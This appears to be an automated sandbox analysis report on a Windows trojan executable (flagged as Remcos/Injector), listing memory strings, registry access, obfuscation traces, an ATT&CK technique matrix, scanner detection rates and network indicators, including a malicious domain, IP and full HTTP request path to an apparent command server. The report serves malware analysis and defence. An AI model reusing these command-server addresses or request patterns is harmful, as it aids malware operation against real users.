00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvskotxe
                Source: ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/le
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.250684430.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/ain.co.in/pe
                Source: ncIpox4w8f.exe, 00000000.00000003.450585994.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.455246680.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457658604.00000000007D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/c
                Source: ncIpox4w8f.exe, 00000000.00000003.306711396.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/h
                Source: ncIpox4w8f.exe, 00000000.00000003.390661773.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/j
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.328765144.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.367752702.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/le
                Source: ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/pe
                Source: ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/roso
                Source: ncIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/rpriseCertificates
                Source: ncIpox4w8f.exe, 00000000.00000003.250747131.000000000080F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vervain.co.in/t
                Source: unknown
                DNS traffic detected: queries for: vervain.co.in
                Source: global traffic
                HTTP traffic detected: GET /3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk HTTP/1.1 User-Agent: lVali Host: vervain.co.in
                Source: unknown HTTPS traffic detected: 199.79.62.221:443 -> 192.168.2.4:49744 version: TLS 1.2
                Source: ncIpox4w8f.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: ncIpox4w8f.exe Binary or memory string: OriginalFilename vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, 00000000.00000003.239564006.0000000002294000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs ncIpox4w8f.exe
                Source: ncIpox4w8f.exe, Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                Source: ncIpox4w8f.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Section loaded: system.dll
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029C4F14
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029C138F
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A0F8C1
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029B8117
                Source: ncIpox4w8f.exe, Static PE information: Resource name: RT_STRING type: COM executable for DOS
                Source: ncIpox4w8f.exe, Virustotal: Detection: 52%
                Source: ncIpox4w8f.exe, ReversingLabs: Detection: 55%
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, File read: C:\Users\user\Desktop\ncIpox4w8f.exe
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32
                Source: classification engine, Classification label: mal80.troj.winEXE@1/0@1/1
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, File read: C:\Windows\System32\drivers\etc\hosts

                Data Obfuscation

                Source: Yara match, File source: ncIpox4w8f.exe, type: SAMPLE
                Source: Yara match, File source: 0.0.ncIpox4w8f.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000000.238770915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A0EEA5 push 004A0C11h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A11DB5 push 004A38A0h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A11D3D push 004A3816h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A11D69 push 004A385Eh; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A11DF9 push 004A38D2h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_02A0F9D5 push 004A14B3h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029BA593 push 004A3816h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029BA5BF push 004A385Eh; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029BA60B push 004A38A0h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029B822B push 004A14B3h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029BA64F push 004A38D2h; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_029BA777 push 380043CAh; retf 0043h
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_0493CD38 push eax; ret
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\ncIpox4w8f.exe, Code function: 0_3_0493CFA4 LdrInitializeThunk,
                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Software Packing | OS Credential Dumping | 1 System Information Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | LSASS Memory | 1 Remote System Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 4 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Ingress Tool Transfer | SIM Card Swap | | Carrier Billing Fraud
                Source | Detection | Scanner | Label
                ncIpox4w8f.exe | 52% | Virustotal |
                ncIpox4w8f.exe | 55% | ReversingLabs | Win32.Trojan.Remcos
                ncIpox4w8f.exe | 100% | Avira | TR/Injector.ikbgv

                No Antivirus matches

                Source | Detection | Scanner | Label
                0.2.ncIpox4w8f.exe.2a34530.0.unpack | 100% | Avira | TR/Patched.Ren.Gen

                Source | Detection | Scanner | Label
                vervain.co.in | 8% | Virustotal |

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                vervain.co.in | 199.79.62.221 | true | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk | true | Avira URL Cloud: malware | unknown
00000000.00000003.280613950.0000000005258000.00000004.00001000.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.333581477.0000000005518000.00000004.00001000.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/lencIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.395675590.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.344946189.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/pencIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.250684430.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.255360203.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.252950036.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382209137.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2yncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.397940180.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.390766181.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9encIpox4w8f.exe, 00000000.00000002.515020113.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2tncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443365066.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.412105377.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskustncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk24encIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk2ncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.502989653.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.500416141.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/KncIpox4w8f.exe, 00000000.00000003.313047462.000000000080F000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280241715.000000000080F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/NncIpox4w8f.exe, 00000000.00000003.401161238.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.405146329.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.382108941.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416691334.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.435949378.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.393118648.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.411977070.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.443210600.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384479510.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433570492.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.483953097.00000000007D9000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.440772986.00000000007D9000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/EncIpox4w8f.exe, 00000000.00000003.303406339.000000000080F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/Jsibtswtoeethvjdrykaimaovwatvsk9encIpox4w8f.exe, 00000000.00000003.263297176.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.266148150.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvsknyncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.324671146.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.280207493.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.286441271.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.288987691.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/Jsibtswtoeethvjdrykaimaovwatvsk0.1ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.309024067.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/3437E44F6689E610&resi25412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimancIpox4w8f.exe, 00000000.00000003.340893762.0000000000809000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/5412545d3437E44F6689E61025874515/JsibtswtoeethvjdrykaimaovwatvskncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.426376750.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.495649105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.419087530.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.283324784.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.376712057.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.421607105.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.484095926.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.491013350.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.384591005.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.369971422.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.481752910.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.347983893.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.416838008.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 
00000000.00000003.438586801.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.431331290.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.401276739.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
                https://vervain.co.in/ain.co.in/025874515/JsibtswtoeethvjdrykaimaovwatvskityncIpox4w8f.exe, 00000000.00000003.477298168.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.448344033.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.465386950.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.450720668.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.453108202.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.472777647.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.470320636.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.433704341.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.460364884.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.457798232.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.436106009.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, ncIpox4w8f.exe, 00000000.00000003.445748706.00000000007FB000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                unknown
